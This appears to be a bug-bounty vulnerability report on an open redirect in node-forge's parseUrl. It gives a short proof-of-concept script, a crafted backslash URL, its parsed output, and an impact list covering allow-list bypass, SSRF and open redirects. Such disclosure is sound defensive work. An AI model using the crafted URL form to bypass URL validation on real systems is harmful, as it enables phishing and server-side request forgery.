Open Redirect in digitalbazaar/forge
Reported on
Sep 4th 2021
✍️ Description
parseUrl functionality in node-forge mishandles certain uses of backslash such as https:/\/\/\ and interprets the URI as a relative path. Browsers accept backslashes after the protocol, and treat it as a normal slash, while node-forge sees it as a relative path and leads to URL Redirection to Untrusted Site.
🕵️♂️ Proof of Concept
Create the following PoC file:
// poc.js
var forge = require("node-forge");
var url = forge.util.parseUrl("https:/\/\/\www.github.com/foo/bar");
console.log(url);
Execute the following commands in another terminal:
npm i node-forge # Install affected module
node poc.js # Run the PoC
Check the Output:
{
full: 'https://',
scheme: 'https',
host: '',
port: 443,
path: '/www.github.com/foo/bar', <<<---- path should be "/foo/bar"
fullHost: ''
}
In the above example path should be "/foo/bar" or it should return it as null as per https://github.com/digitalbazaar/forge/blob/c666282c812d6dc18e97b419b152dd6ad98c802c/lib/util.js#L2266
💥 Impact
Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.
Occurrences
SECURITY.md
2 years ago
The whole forge.util.parseUrl API and other URL related APIs were removed in v1.0.0.
@maintainer Can you please validate this issue by clicking on Mark as valid. And confirm the fix. Thanks.